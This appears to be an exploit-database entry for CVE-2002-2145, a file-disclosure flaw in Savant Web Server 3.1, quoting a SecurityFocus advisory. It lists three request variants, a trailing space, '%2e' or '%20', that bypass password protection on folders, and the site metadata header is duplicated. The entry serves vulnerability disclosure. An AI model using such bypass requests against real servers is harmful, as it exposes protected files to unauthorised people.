Savant Web Server 3.1 - File Disclosure
| EKU-ID: 27294 | CVE: CVE-2002-2145;OSVDB-16593 | OSVDB-ID: |
| Author: Auriemma Luigi | Published: 2002-09-13 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 27294 | CVE: CVE-2002-2145;OSVDB-16593 | OSVDB-ID: |
| Author: Auriemma Luigi | Published: 2002-09-13 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/5709/info Savant Webserver is vulnerable to an input validation bug, that could allow malicious users access to password protected folders. It should be noted that versions below 3.1 may also be vulnerable to this issue. http://host/password_folder. "GET /password_folder / HTTP/1.0" <-- use with telnet http://host/password_folder%2e http://host/password_folder%20